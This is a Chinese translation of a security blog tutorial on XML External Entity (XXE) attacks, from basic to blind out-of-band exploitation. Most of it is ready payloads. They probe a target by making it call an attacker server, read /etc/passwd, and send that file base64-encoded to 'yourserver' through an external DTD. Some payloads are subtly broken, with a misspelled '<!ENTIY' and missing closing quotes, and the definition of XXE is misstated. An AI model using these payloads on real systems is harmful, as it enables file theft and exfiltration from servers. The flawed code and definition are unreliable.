【技巧总结】理解XXE从基础到盲打

时间:2022-09-27 21:42:51

原文:http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html

这篇文章中将讨论以下问题。

XXE是什么?

如何确认XXE?

如何利用基本XXE?

如何盲打XXE?

以及盲打XXE有效载荷的备选方案。

首先要了解一些基本的关键词。

实体:实体引用充当缩写或可以在外部位置找到的数据。语法:&test;

最常见的实体是:

内部实体:如果实体在DTD内声明,则称为内部实体。

语法:<!ENTITY entity_name "entity_value">

外部实体:如果实体在DTD之外声明,则称为外部实体。由“系统”标识。

语法:<!ENTITY entity_name SYSTEM "entity_value">

参数实体:参数实体的目的是能够创建替换文本的可重用部分。(如果不理解,以后会更清楚。)

语法:<!ENTITY % entity "another entity (Internal or External)">

XXE是什么?

XXE是XML External Entity的简称,在错误配置XML解析器解析内部实体时出现的漏洞。XXE有两种类型:

  • 1、基础
  • 2、盲打

基础一:

有一个URL参数解析了XML数据,如:http://myapp.com/somefile.php?xml=

当向这个URL提供XML数据时,并且该数据打印回用户的浏览器,就可以尝试基础的XXE。确认漏洞的存在可以利用以下的方法:

Payload 1:

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY test SYSTEM 'http://yourserverip/'>]>
<root>&test;</root>

现在来理解原理。

1、首先声明XML语法,定义DOCTYPE后再定义XML主体的内容。

2、在DOCTYPE(即root)之后定义根元素,接下来定义实体,该实体包含SYSTEM属性,表明该实体是外部的。

3、定义服务器的ip,因为要让目标服务器向攻击者的服务器发送请求。

当Payload被XML解析,存在漏洞的XML解析方式会解析实体&test,然后实体中对应的是攻击者的服务器IP,所以将通过向攻击者服务器IP请求的方式处理外部实体。

所以如果攻击者的服务器在网络日志文件中有一个新的连接,那么就可以确认找到了XXE漏洞。

利用漏洞:

读取Web服务器的本地文件,可以使用以下有效载荷来完成。

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>

XML解析器将像上面一样处理这个Payload,但现在不会向攻击者的服务器发送请求,而是使用文件协议在本地请求/etc/passwd文件,检索出文件内容并显示出来。 因此攻击者可以读取这台WEB服务器的本地文件。

如果XML数据没有显示内容该怎么办?(Blind XXE Case)

仍然可以通过使用上面的第一个Payload来确认漏洞的存在。但是不能看到Web服务器本地文件的文件内容。这仍然是一个安全问题,但严重性有点低。而且这被称为 Blind XXE 或Out-of-band XXE。

这意味着攻击者必须使用Bild Paylod,将WEB服务器的本地文件内容发送到攻击者的服务器。

Payload 2:

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % test SYSTEM 'http://yourserver/xml.dtd'> %test; %exe]>
<root>&entity;</root>

xml.dtd 内容:

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTIY % exe "<!ENTITY entity SYSTEM 'http://yourserver/%file;'>">

理解上述代码:

以上代码使用的是外部DTD文件,即%test。因此xml解析器将解析这个实体并向攻击者的WEB服务器发出请求获取DTD文件的内容。而那个DTD文件中攻击者定义了一些要处理的实体。

%exe;将生成另一个实体,即实体&entiry。并且该实体将使用文件内容向攻击者的服务器发出请求。 具体的文件内容是在实体%file中的php://filter/convert.base64-encode/resource=/etc/passwd获取的;

当xml解析器解析实体%file时,该实体将grep受攻击的服务器本地文件的文件内容。使用php filter进行编码。

可以看一个视频了解攻击者是如何操作的。

http://agrawalsmart7.com//bandicam 2018-11-04 23-35-26-024.mp4

有人可能会产生这样的问题:为什么要从攻击者的服务器调用DTD?为什么不直接利用Payload?

Payload 3:

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % filecontents SYSTEM 'file:///etc/passwd>
<!ENTITY test SYSTEM 'http://yourserver/%filecontents;'>]>
<root>&test;</root>

答案是因为根据XML_DOC,参数实体不能在DTD子集内调用,但是可以在外部子集中调用(Payload 2中的利用形式)。 这种形式使用后将提示禁止的错误。

这就是为什么不能在Payload之上运行的原因。

试试另一个有效载荷:

Payload 4:

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY filecontents SYSTEM 'file:///etc/passwd>
<!ENTITY test SYSTEM 'http://yourserver/&filecontents;'>]>
<root>&test;</root>

以上这个Payload就没有任何问题,因为实体被作为字符串解析。实体应该在根标记中,如果不是就会被作为一个字符串解析。